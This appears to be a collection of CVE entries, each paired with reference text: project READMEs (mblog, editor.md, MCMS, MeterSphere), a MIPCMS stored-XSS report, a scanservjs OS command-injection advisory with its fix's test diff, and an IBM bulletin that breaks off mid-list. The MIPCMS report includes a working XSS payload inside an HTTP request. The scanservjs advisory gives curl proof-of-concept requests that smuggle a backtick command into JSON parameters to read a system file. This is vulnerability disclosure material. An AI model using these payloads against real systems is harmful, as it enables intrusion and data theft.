OS Command injection vulnerability in mblog 3.5.0 allows attackers to execute arbitrary code via crafted theme when it gets selected.

**Mblog 开源Java博客系统, 支持多用户, 支持切换主题**

     

**技术选型：**

*   JDK8
*   MySQL
*   Spring-boot
*   Spring-data-jpa
*   Shiro
*   Lombok
*   Freemarker
*   Bootstrap
*   SeaJs

**启动：**

*   main方法运行

配置：src/main/resources/application-mysql.yml (数据库账号密码)、新建db\_mblog的数据库
运行：src/main/java/com/mtons/mblog/BootApplication
访问：http://localhost:8080/
后台：http://localhost:8080/admin
账号：默认管理员账号为 admin/12345

TIPS: 
如遇到启动失败/切换环境变量后启动失败的,请先maven clean后再尝试启动
IDE得装lombok插件

*   文档: 说明文档
*   官网: 官网地址
*   QQ交流群：378433412

**版本(4.0)更新内容：**

    1. 新增 <@layout.extends name="xxx"></layout.extends> 标签, 用于进入模板文件, 解决主题开发时各种路径带入主题名的问题
    2. 新增 <@layout.block name="header"></layout.block> 标签, 用于模板的占位, 可配合`layout.put`替换指定block区域内容,
    3. 新增 <@layout.put block="contents" type="APPEND"></layout.put> 标签, 用户替换模板内容块, 丢弃freemarker变量传递, 增强主题可维护性
    4. `layout.put`中的type 支持替换类型: APPEND, PREPEND, REPLACE
    5. 调整`default`, `classic`主题, 使用新的主题开发方式
    6. `建议MySQL版本5.7`, 如果不能满足5.7+可自行去除flyway依赖及代码
    

**版本(3.5)更新内容：**

    1. 文件存储目录可配置, 见 site.location, 默认为 user.dir
    2. 支持在${site.location}/storage/templates 目录下扩展自己的主题(${site.location}具体位置见启动日志)
    3. 后台未配置对应第三方登录信息时, 前端不显示对应的按钮
    4. 模板优化
    5. 后台配置主题改为自动从目录中加载
    6. 新增markdown编辑器, 可在后台选择tinymce/markdown
    

**版本(3.0)更新内容：**

    1. 新增开关控制(注册开关, 发文开关, 评论开发)
    2. 后台重写, 替换了所有后台页面功能更完善
    3. 上传图片添加更多支持(本地/又拍云/阿里云/七牛云), 详情见后台系统配置
    4. 升级为spring-boot2
    5. 调整模板静态资源引用,方便扩展
    6. 表名调整, 旧版本升级时请自行在数据库重命名, 详情见change.log
    7. 重写了config(改为options), 可在applicaiton.yaml设置默认配置, 启动后将以options中配置为准
    8. 支持后台设置主题
    9. 去除了本地文件上传目录配置, 改为自动取项目运行目录(会在jar同级目录生成storeage和indexes目录)
    10. 替换表单验证插件, 评论表情改为颜文字
    11. 我的主页和Ta人主页合并
    12. 优化了图片裁剪功能
    13. 支持Docker, 详情见 https://hub.docker.com/r/langhsu/mblog
    14. 邮件服务后台可配
    15. 新增标签页
    16. 新增注册邮箱验证开关(需要手动删除之前的 mto_security_code 表)
    

**图片演示**

 

**扩展主题**

Youth 主题传送门 (作者:小崔崔)(提取码: 25e9)

*   感谢开发主题大佬们的无私奉献

CVE-2021-27280: GitHub - langhsu/mblog: 开源免费的Java博客系统, 采用spring-boot、spring-data-jpa、shiro、freemarker、bootstrap等框架, 支持Docker

Cross Site Scripting (XSS) pandao editor.md 1.5.0 allows attackers to execute arbitrary code via crafted linked url values.

**Editor.md** : The open source embeddable online markdown editor (component), based on CodeMirror & jQuery & Marked.

<link rel\="stylesheet" href\="editor.md/css/editormd.min.css" />
<div id\="editor"\>
    
    <textarea style\="display:none;"\>\### Hello Editor.md !</textarea\>
</div\>
<script src\="jquery.min.js"\></script\>
<script src\="editor.md/editormd.min.js"\></script\>
<script type\="text/javascript"\>
    $(function() {
        var editor \= editormd("editor", {
            // width: "100%",
            // height: "100%",
            // markdown: "xxxx",     // dynamic set Markdown text
            path : "editor.md/lib/"  // Autoload modules mode, codemirror, marked... dependents libs path
        });
    });
</script\>

<link rel\="stylesheet" href\="editormd/css/editormd.preview.css" />
<div id\="test-markdown-view"\>
    
    <textarea style\="display:none;"\>\### Hello world!</textarea\>             
</div\>
<script src\="jquery.min.js"\></script\>
<script src\="editormd/editormd.js"\></script\>
<script src\="editormd/lib/marked.min.js"\></script\>
<script src\="editormd/lib/prettify.min.js"\></script\>
<script type\="text/javascript"\>
    $(function() {
	    var testView \= editormd.markdownToHTML("test-markdown-view", {
            // markdown : "\[TOC\]\\n### Hello world!\\n## Heading 2", // Also, you can dynamic set Markdown text
            // htmlDecode : true,  // Enable / disable HTML tag encode.
            // htmlDecode : "style,script,iframe",  // Note: If enabled, you should filter some dangerous HTML tags for website security.
        });
    });
</script\>    

Sorry, Editor.md not support HTML to Markdown parsing, Maybe In the future.

{
    mode                 : "gfm",          // gfm or markdown
    name                 : "",             // Form element name for post
    value                : "",             // value for CodeMirror, if mode not gfm/markdown
    theme                : "",             // Editor.md self themes, before v1.5.0 is CodeMirror theme, default empty
    editorTheme          : "default",      // Editor area, this is CodeMirror theme at v1.5.0
    previewTheme         : "",             // Preview area theme, default empty
    markdown             : "",             // Markdown source code
    appendMarkdown       : "",             // if in init textarea value not empty, append markdown to textarea
    width                : "100%",
    height               : "100%",
    path                 : "./lib/",       // Dependents module file directory
    pluginPath           : "",             // If this empty, default use settings.path + "../plugins/"
    delay                : 300,            // Delay parse markdown to html, Uint : ms
    autoLoadModules      : true,           // Automatic load dependent module files
    watch                : true,
    placeholder          : "Enjoy Markdown! coding now...",
    gotoLine             : true,           // Enable / disable goto a line
    codeFold             : false,
    autoHeight           : false,
    autoFocus            : true,           // Enable / disable auto focus editor left input area
    autoCloseTags        : true,
    searchReplace        : true,           // Enable / disable (CodeMirror) search and replace function
    syncScrolling        : true,           // options: true | false | "single", default true
    readOnly             : false,          // Enable / disable readonly mode
    tabSize              : 4,
    indentUnit           : 4,
    lineNumbers          : true,           // Display editor line numbers
    lineWrapping         : true,
    autoCloseBrackets    : true,
    showTrailingSpace    : true,
    matchBrackets        : true,
    indentWithTabs       : true,
    styleSelectedText    : true,
    matchWordHighlight   : true,           // options: true, false, "onselected"
    styleActiveLine      : true,           // Highlight the current line
    dialogLockScreen     : true,
    dialogShowMask       : true,
    dialogDraggable      : true,
    dialogMaskBgColor    : "#fff",
    dialogMaskOpacity    : 0.1,
    fontSize             : "13px",
    saveHTMLToTextarea   : false,          // If enable, Editor will create a <textarea name="{editor-id}-html-code"> tag save HTML code for form post to server-side.
    disabledKeyMaps      : \[\],
    
    onload               : function() {},
    onresize             : function() {},
    onchange             : function() {},
    onwatch              : null,
    onunwatch            : null,
    onpreviewing         : function() {},
    onpreviewed          : function() {},
    onfullscreen         : function() {},
    onfullscreenExit     : function() {},
    onscroll             : function() {},
    onpreviewscroll      : function() {},
    
    imageUpload          : false,          // Enable/disable upload
    imageFormats         : \["jpg", "jpeg", "gif", "png", "bmp", "webp"\],
    imageUploadURL       : "",             // Upload url
    crossDomainUpload    : false,          // Enable/disable Cross-domain upload
    uploadCallbackURL    : "",             // Cross-domain upload callback url

    toc                  : true,           // Table of contents
    tocm                 : false,          // Using \[TOCM\], auto create ToC dropdown menu
    tocTitle             : "",             // for ToC dropdown menu button
    tocDropdown          : false,          // Enable/disable Table Of Contents dropdown menu
    tocContainer         : "",             // Custom Table Of Contents Container Selector
    tocStartLevel        : 1,              // Said from H1 to create ToC
    htmlDecode           : false,          // Open the HTML tag identification 
    pageBreak            : true,           // Enable parse page break \[========\]
    atLink               : true,           // for @link
    emailLink            : true,           // for email address auto link
    taskList             : false,          // Enable Github Flavored Markdown task lists
    emoji                : false,          // :emoji: , Support Github emoji, Twitter Emoji (Twemoji);
                                           // Support FontAwesome icon emoji :fa-xxx: > Using fontAwesome icon web fonts;
                                           // Support Editor.md logo icon emoji :editormd-logo: :editormd-logo-1x: > 1~8x;
    tex                  : false,          // TeX(LaTeX), based on KaTeX
    flowChart            : false,          // flowChart.js only support IE9+
    sequenceDiagram      : false,          // sequenceDiagram.js only support IE9+
    previewCodeHighlight : true,           // Enable / disable code highlight of editor preview area

    toolbar              : true,           // show or hide toolbar
    toolbarAutoFixed     : true,           // on window scroll auto fixed position
    toolbarIcons         : "full",         // Toolbar icons mode, options: full, simple, mini, See \`editormd.toolbarModes\` property.
    toolbarTitles        : {},
    toolbarHandlers      : {
        ucwords : function() {
            return editormd.toolbarHandlers.ucwords;
        },
        lowercase : function() {
            return editormd.toolbarHandlers.lowercase;
        }
    },
    toolbarCustomIcons   : {               // using html tag create toolbar icon, unused default <a> tag.
        lowercase        : "<a href=\\"javascript:;\\" title=\\"Lowercase\\" unselectable=\\"on\\"><i class=\\"fa\\" name=\\"lowercase\\" style=\\"font-size:24px;margin-top: -10px;\\">a</i></a>",
        "ucwords"        : "<a href=\\"javascript:;\\" title=\\"ucwords\\" unselectable=\\"on\\"><i class=\\"fa\\" name=\\"ucwords\\" style=\\"font-size:20px;margin-top: -3px;\\">Aa</i></a>"
    },
    toolbarIconTexts     : {},
    
    lang : {  // Language data, you can custom your language.
        name        : "zh-cn",
        description : "开源在线Markdown编辑器<br/>Open source online Markdown editor.",
        tocTitle    : "目录",
        toolbar     : {
            //...
        },
        button: {
            //...
        },
        dialog : {
            //...
        }
        //...
    }
}

The MIT License.

CVE-2020-19660: GitHub - pandao/editor.md: The open source embeddable online markdown editor (component).

Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

File upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.

**价值源自分享**

    

铭飞平台 后台演示 前台演示 在线使用手册 腾讯课堂在线视频  
代码生成器视频教程  
Windows一键运行版本\\Linux一键运行版本 Docker体验

一直在改变，从未停止过！  
QQ交流群号：     

**开源说明**

*   系统100%开源
*   模块化开发模式，铭飞所开发的模块都发布到了maven中央库。 可以通过pom.xml文件的方式拉取源代码

    <dependency>
    	<groupId>net.mingsoft</groupId>
    	<artifactId>模块</artifactId>
    	<version>版本号</version>
    	<classifier>sources</classifier>
    	<scope>provided</scope>
    </dependency>
    

**商用**

基于MIT开源协议，可直接商用无需授权，但请尊重开源精神不要去掉代码中铭飞的注释和版权信息

**特点**

*   免费完整开源：基于MIT协议，源代码完全开源，无商业限制,MS开发团队承诺将MCMS内容系统永久完整开源；  
    
*   标签化建站：不需要专业的后台开发技能，只要使用系统提供的标签，就能轻松建设网站；  
    
*   html静态化：系统支持全站静态化；  
    
*   跨终端：站点同时支持PC与移动端访问，同时会自动根据访问的终端切换到对应的界面，数据由系统统一管理；  
    
*   海量模版：铭飞通过MStore（MS商城）分享更多免费、精美的企业网站模版，降低建站成本；  
    
*   丰富插件：为了让MCms适应更多的业务场景，在MStore用户可以下载对应的插件，如：站群插件、微信插件、商城插件等；  
    
*   每月更新：铭飞团队承诺每月28日为系统升级日，分享更多好用等模版与插件；  
    
*   文档丰富：为了让用户更快速的使用MCms系统进行开发，铭飞团队持续更新开发相关文档，如标签文档、使用文档、视频教程等；  
    

**面向对象**

*   企 业：帮助创立初期的公司或团队快速搭建产品的技术平台，加快公司项目开发进度；
*   开发者：帮助开发者快速完成承接外包的项目，避免从零搭建系统；
*   学习者：初学JAVA的同学可以下载源代码来进行学习交流；

**开发环境**

建议开发者使用以下环境，这样避免版本带来的问题

*   Windows、Linux
*   Eclipse、Idea
*   Mysql≧5.7 (开启忽略大小写)
*   JDK≧8
*   Tomcat≧8

**快速体验（导入到 Eclipse 或 IDEA）**

1、检出源代码： git clone https://gitee.com/mingSoft/MCMS.git  
2、导入项目  

*   Eclipse导入，菜单 File -> Import，然后选择 Maven -> Existing Maven Projects，点击 Next> 按钮，选择检出的项目MCMS文件夹，然后点击 Finish 按钮，即可成功导入
*   IDEA导入，点击 Import Project，选择 pom.xml 文件，点击 Next 按钮，选择 Import Maven projects automatically 复选框，然后一直点击 Next 按钮，直到点击 Finish 按钮，即可成功导入  
    

4、Eclipse（IDEA）会自动加载 Maven 依赖包，初次加载会比较慢（根据自身网络情况而定），若工程上有小叉号，请打开 Problems 窗口，查看具体错误内容，直到无错误为止  
5、创建数据库mcms（数据库使用utf-8编码），导入doc/mcms-版本号.sql，如果升级现有系统请使用＊-up-\*.sql升级，如果导入了系统对应的完整版SQL，sql升级补丁不需要重复导入；  
6、修改src\\main\\resources\\application-dev.yml文件中的数据库设置参数；  
7、运行MSApplication.java main方法  
8、首先先访问后台地址：http://localhost:8080/ms/login.do，管理员账号，用户名：msopen 密码：msopen，进入后台点击内容管理->静态化菜单，进行"生成主页"，"生成栏目","生成文章"操作一遍 （注意！！！是后台登录界面，不是会员中心登录界面）

**快速体验（docker）**

    docker run -p 3306:3306 -p 8080:8080 --name mcms --privileged=true -e TZ=Asia/Shanghai  \
    --restart=always -e MYSQL_ROOT_PASSWORD=123456 -d mingsoft/mcms \
    --sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" \
    --lower-case-table-names=1 \
    --query-cache-type=1 \
    --query-cache-size=600000 \
    --max-connections=1000
    
    

MYSQL_ROOT_PASSWORD 数据库密码，如果修改需要修改容器 /home/mcms/config/ 下配置文件的链接，实际部署可以将 /home/mcms 挂载到外部文件夹，方便更新 mcms 系统文件

**技术选型****后端框架**

技术

名称

官网

Spring Framework

容器

http://projects.spring.io/spring-framework

Spring Boot

MVC

https://spring.io/projects/spring-boot

Apache Shiro

安全

http://shiro.apache.org

Spring session

分布式Session管理

http://projects.spring.io/spring-session

MyBatis

DAO

http://www.mybatis.org

MyBatis-Plus

ORM

https://baomidou.com/

Freemarker

视图

http://freemarker.foofun.cn

PageHelper

MyBatis分页插件

http://git.oschina.net/free/Mybatis\_PageHelper

Log4J

日志组件

http://logging.apache.org

Maven

项目构建

http://maven.apache.org

Elasticsearch

分布式搜索引擎

https://www.elastic.co

Redis

分布式缓存数据库

https://redis.io

hutool

工具类

http://hutool.mydoc.io

**前端框架**

技术

名称

官网

VUE

MVVM框架

https://cn.vuejs.org//

Element UI

UI库

https://element.eleme.cn/2.0/#/zh-CN

jQuery

函式库

http://jquery.com/

Waves

点击效果插件

https://github.com/fians/Waves/

validator

验证库

https://github.com/chriso/validator.js

animate

动画

http://daneden.github.io/animate.css/

icon

矢量小图标(待更新)

https://www.iconfont.cn/

**文件说明**

*   doc 项目文档文件夹，里面有数据库文件
*   src/main/java java源代码
*   src/main/resources 项目的资源配置文件
*   src/main/webapp
*   src/main/webapp/static 静态资源文件，如：js、css、image、等第三方前端插件库
*   src/main/webapp/html 生成的静态页面，实际项目需要删除，只是提供给开发者快速预览生成后的静态页面
*   src/main/webapp/templet 模版文件夹
*   src/main/webapp/upload 上传资源文件夹
*   src/main/webapp/WEB-INF/manager 后端视图页面
*   LICENSE 项目协议说明
*   README.md 项目说明文档
*   pom.xml 依赖配置文件

**文档**

*   使用手册 http://doc.mingsoft.net/mcms/
*   插件手册 http://doc.mingsoft.net/plugs/

**关于版本说明 更多版本查看**

1.  开源版本永久免费发布源代码，开发者、企业可以终身免费使用，每个月团队会收集开源系统的问题并在每月的28号进行更新；
2.  企业版本以上更新频率上更快，功能也比开源版本的要多，同时会根据不同版本提供额外插件，不同版本也会提供不同的人工在线服务（服务时间工作日 9:30-17:30）

**软件截图**

**铭飞平台**

以下功能都可以在平台 https://www.mingsoft.net 上免费使用 做开源我们是业余的，写代码我们是认真的。研发产品的路上我们一直在探索、一直在学习、一直在用心投入，希望能给更多的企业与开发者提供一些更有价值的服务。

**项目管理**

**代码生成器**

**模版插件分享**

价值源自分享，开发者可以再MStore安装分享插件进行分享模版（后续会升级到插件分享），让代码给开发者带来更多的被动收入！

CVE-2020-22755: GitHub - ming-soft/MCMS: 完整开源！Java快速开发平台！基于Spring、SpringMVC、Mybatis架构，MStore提供更多好用的插件与模板（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等，同时提供上百套免费模板任意选择），价值源自分享！铭飞系统不仅一套简单好用的开源系统、更是一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench

**一站式开源持续测试平台**

   

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能，全面兼容 JMeter、Selenium 等主流开源标准，有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试，加速高质量的软件交付，推动中国测试行业整体效率的提升。

**MeterSphere 的功能**

*   **测试跟踪**: 对接主流项目管理平台，测试过程全链路跟踪管理；列表脑图模式自由切换，用例编写更简单、测试报告更清晰；
*   **接口测试**: 比 JMeter 易用，比 Postman 强大； API 管理、Mock 服务、场景编排、多协议支持，你想要的全都有；
*   **UI 测试**: 基于 Selenium 浏览器自动化，高度可复用的测试脚本； 无需复杂的代码编写，人人都可开展的低代码自动化测试；
*   **性能测试**: 兼容 JMeter 的同时补足其分布式、监控与报告以及管理短板; 轻松帮助团队实现高并发、分布式的性能压测，完成压测任务的统一调度与管理。

**MeterSphere 的优势**

*   **开源**：基于开源、兼容开源；按月发布新版本、日均下载安装超过100次、被大量客户验证；
*   **一站式**：一个产品全面涵盖测试跟踪、接口测试、UI测试、性能测试等功能并形成联动；
*   **全生命周期**：一个产品全满足从测试计划、测试执行到测试报告分析的全生命周期需求；
*   **持续测试**：无缝对接 Bug 管理工具和持续集成工具等，能将测试融入持续交付和 DevOps 体系；
*   **团队协作**：支持团队协作和资产沉淀，无论团队规模如何，总有适合的落地方式。

**UI 展示**

**快速开始**

**一键安装**

仅需两步快速安装 MeterSphere：

1.  准备一台不小于 8 G内存的 64位 Linux 主机；
2.  以 root 用户执行如下命令一键安装 MeterSphere。

curl -sSL https://resource.fit2cloud.com/metersphere/metersphere/releases/latest/download/quick\_start.sh | bash

**学习资料**

*   在线文档
*   社区论坛
*   在线体验

**加入微信交流群**

**版本说明**

MeterSphere 版本号命名规则为：v大版本.功能版本.Bug修复版本。比如：

    v1.0.1 是 v1.0.0 之后的Bug修复版本；
    v1.1.0 是 v1.0.0 之后的功能版本。
    

像其它优秀开源项目一样，MeterSphere 将按月发布功能版本、按年度发布 LTS（Long Term Support）版本。

MeterSphere 的最新 LTS 版本为 v1.20 LTS。MeterSphere 下一个 LTS 版本为 v2.10 LTS，预计在 2023 年第二季度发布。

**技术栈**

*   后端: Spring Boot
*   前端: Vue.js
*   中间件: MySQL, Kafka, MinIO
*   基础设施: Docker, Kubernetes
*   测试引擎: JMeter

**安全说明**

如果您在使用过程中发现任何安全问题，请通过以下方式直接联系我们：

*   邮箱：support@fit2cloud.com
*   电话：400-052-0755

**致谢**

*   BlazeMeter：感谢 BlazeMeter 提供的设计思路
*   JMeter：MeterSphere 使用了 JMeter 作为测试引擎
*   Element：感谢 Element 提供的优秀组件库

**License & Copyright**

Copyright (c) 2014-2023 飞致云 FIT2CLOUD, All rights reserved.

Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

https://www.gnu.org/licenses/gpl-3.0.html

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

CVE-2023-29944: GitHub - metersphere/metersphere: MeterSphere 是一站式开源持续测试平台，覆盖测试管理、接口测试、UI 测试和性能测试等。搞测试，就选 MeterSphere！

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.



**Description**

Scanservjs has a RESTful API that provides endpoints for interacting with scanners using the SANE library. There are two APIs for scanning an image and generating a preview image that call out to Process.spawn, invoking a scanimage command as a subprocess of the server, and passing arguments from the API request body as arguments into the subprocess. Both APIs suffer from OS Command Injection via type confusion in several parameters in the POST body. While the business logic does sanitize string parameters from these API calls, it doesn't sufficiently prevent arrays of strings from being passed in several vulnerable POST body parameters. This allows an attacker to pass a JSON array with a single string parameter, buffeted by backticks, which gets formatted as a string and placed in the arguments for scanimage. This ultimately executes a subshell with an arbitrary command passed by the attacker, leading to remote code execution. While scanservjs has the option to enable HTTP Basic Auth, it is hidden in the config and there is no documentation on this feature, therefore this is a remote code execution without authentication by default.

**Proof of Concept****POST /scan Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/scan \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":["`cat /etc/os-release 1>&2`"],"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed"},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution `cat /etc/os-release 1>&2` -l 0 -t 0 -x 216 -y 297 --format tiff -o data/temp/~tmp-scan-0-0001.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Proof of Concept****POST /preview Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/preview \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":100,"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed", "contrast": ["`cat /etc/os-release 1>&2`"]},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution 100 -l 0 -t 0 -x 216 -y 297 --format tiff --contrast `cat /etc/os-release 1>&2` -o data/preview/preview.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Impact**

The vulnerability can execute any process on the server using a subshell, so the compromise of the system running scanservjs is almost complete. This vulnerability enables an attacker to dump the contents of any file on the server that the user, or the user's group, associated with the scanservjs process has permissions to read. Exfiltrating data can be done by using code execution in a subshell and redirecting output of a cat like command to stderr. An attacker can do more than query data using the subshell, and can run commands to write data to the server, and execute other processes outside the scope of scanservjs. In the default case, scanservjs is setup with a dedicated non root user so this user cannot read files, write files or execute commands as root. In the worst case, an administrator sets up scanservjs to run as a user with root permissions.

**Occurrences**

command-builder.js L18

The vulnerability occurs in the following code when the parameters passed from the API are formatted and sanitized. String parameters are sanitized and surrounded with single quotes but array type parameters, which can be passed to this function, are not sanitized or quoted. They are then formatted to a string when calling return `${value}`.

      /**
       * @param {string|number} [value]
       * @returns {string}
       */
      _format(value) {
        if (typeof value === 'string') {
          if (value.includes('\'')) {
            throw Error('Argument must not contain single quote "\'"');
          } else if (['$', ' ', '#', '\\', ';'].some(c => value.includes(c))) {
            return `'${value}'`;
          }
        }
        return `${value}`;
      }

CVE-2023-2564: OS Command Injection via Type Confusion in Scan and Preview Parameters in scanservjs

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.

Expand Up @@ -9,12 +9,36 @@ describe('CommandBuilder', () => { 'echo'); });  
it('command-arg', async () \=> { it('command-arg-number', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg(1).build(), 'echo 1'); });  
it('command-arg-boolean', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg(true).build(), 'echo true'); });  
it('command-arg-string-no-space', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('hello-world').build(), 'echo hello-world'); });  
it('command-arg-string-space', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('hello world').build(), 'echo \\'hello world\\''); });  
it('command-arg-string-tab-backtick', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('\`cat\\t/etc/os-release\\t1>&2\`').build(), 'echo \\'\`cat\\t/etc/os-release\\t1>&2\`\\''); });  
it('command-arg-hash', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('-n', 'hello#world').build(), Expand All @@ -27,6 +51,12 @@ describe('CommandBuilder', () => { 'echo -n \\'hello;world\\''); });  
it('command-arg-redirect', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('> thing').build(), 'echo \\'> thing\\''); });  
it('command-security-1', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('-n', 'hello" && ls -al;# world').build(), Expand All @@ -36,13 +66,48 @@ describe('CommandBuilder', () => { it('command-security-2', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg('-n', 'hello\\' && echo break shell').build(), Error, 'Broke shell'); /Error: Argument.\*single quote.\*/); });  
it('command-security-array', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg(\['\`cat /etc/os-release 1>&2\`'\]).build(), /Error: Invalid argument.\*object.\*/); });  
it('command-security-object', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg({arg: '\`cat /etc/os-release 1>&2\`'}).build(), /Error: Invalid argument.\*object.\*/); });  
it('command-quotes"', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('"1\\n2\\n3"').build(), 'echo "1\\n2\\n3"'); 'echo \\'"1\\n2\\n3"\\''); });  
it('command-redirect-good"', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('"hello"').redirect('>').arg('output').build(), 'echo \\'"hello"\\' > output'); });  
it('command-redirect-bad-string', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect('a').build(), /Error: Invalid argument.\*/); });  
it('command-redirect-bad-number', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect(1).build(), /Error: Invalid argument.\*/); });  
it('command-redirect-bad-array', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect(\['invalid'\]).build(), /Error: Invalid argument.\*/); }); });

CVE-2023-2564: SECURITY: CommandBuilder fixes · sbs20/scanservjs@d51fd52

IBM QRadar Data Synchronization App 1.0 through 3.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  217370.

  

**Summary**

The product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM QRadar Data Synchronization App for IBM QRadar SIEM has addressed the applicable CVEs.

**Vulnerability Details**

**CVEID:**   CVE-2022-22313  
**DESCRIPTION:**   IBM QRadar Data Synchronization App uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217370 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-44906  
**DESCRIPTION:**   Node.js Minimist module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in setKey() function in the index.js script. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222195 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2020-7598  
